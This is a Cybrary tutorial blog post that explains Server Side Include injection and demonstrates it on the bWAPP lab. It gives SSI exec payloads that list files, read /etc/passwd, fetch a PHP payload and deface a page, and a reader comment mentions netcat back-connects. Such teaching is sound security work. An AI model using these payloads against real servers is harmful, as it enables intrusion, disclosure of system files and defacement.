Your Introduction to Server Side Include Injection

April 9, 2017 | Views: 4027

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

What is Server Side Include?

Before knowing it, I would ask you a simple question. Let’s assume that you need to develop an application of 100 pages with dynamic content. And each page must have a Header, Footer, Logo. What would be your answer? How much time does it take to add header and footer in all the pages?

Here comes the feature so called Server Side Include (SSI). This is a time-saving feature used for developing applications with dynamic web content. The answer to the above question is the following: To insert a header and a footer on all pages throughout the website we can use the simple command ‘#include’ which inserts into another file. If we need to change anything in the header, then we need to modify the code in one single file. Web pages that contain SSIs often end with a .shtml extension where server understands that those pages that need to be processed.


<!--#command key="value"-->

Yes, this looks like a comment in HTML/XML but it’s not! This SSI varies from server to server(Linux to Windows). I am sharing few examples on servers which are Linux based.
Real time examples for SSI which would be displaying server specific information such as current server time, visitor’s IP address, document type

<!--#config timefmt="%A %d %B, %Y" -->
<!--#echo var="DATE_LOCAL" -->
<!--#echo var="LAST_MODIFIED"-->

Server side include Injection

As you already know about HTML injections, now let’s see what is SSI injection and the impact of it. By the above introduction of SSI, you know that it’s quite useful, time-saving, reusable component. Yes, I do agree with you. But what if your application is in the wrong hands. What could happen? It’s something beyond your imagination. Do you want to know what all we could do if the web server permits SSI execution without proper validation?

Now it’s time to launch over bee-box server. Login to bWAPP and select SSI injection. You should see two input fields first name and last name.

POST by providing some valid data and notice the behavior. You should see your IP address on the web page as shown below.

How does this application know about your IP address? Okay, let’s check source code buddy.


So this code is used to display the IP address of the user. Now let’s try to inject something and see whether we can grab some sensitive data.
Here’re few commands

<!--#echo var="DATE_LOCAL"-->
<!--#exec cmd="ls -al"-->
<!--#exec cmd="cat /etc/passwd"-->
<!--#echo var="DOCUMENT_URI" -->
<!--#exec cmd="wget | rename payload.txt payload.php" -->

On injecting with one of the above commands, I could see data in /etc/passwd

We can also deface the web page with simple command

<!--#exec cmd="echo 'You are hacked!' > /var/www/bWAPP/documents/bee_ssii.htm" -->

Now browse the URL: http://yourIPAddress/bWAPP/documents/bee_ssii.htm
You should see the defaced page. This is nothing but website Defacement which ruins all your reputation.

So, this is all about Server side include injection. If I miss anything, please feel free to post comments below.

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. I wrote an article about this last year on another forum, server side injection is relativly easy to exploit and also to prevent it. You can even use netcat to later backconnect to the target.
    Great article, people should be aware of this as i still see people being vulnerable for this type of attack.

  2. Good Post, Thanks! +10


Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?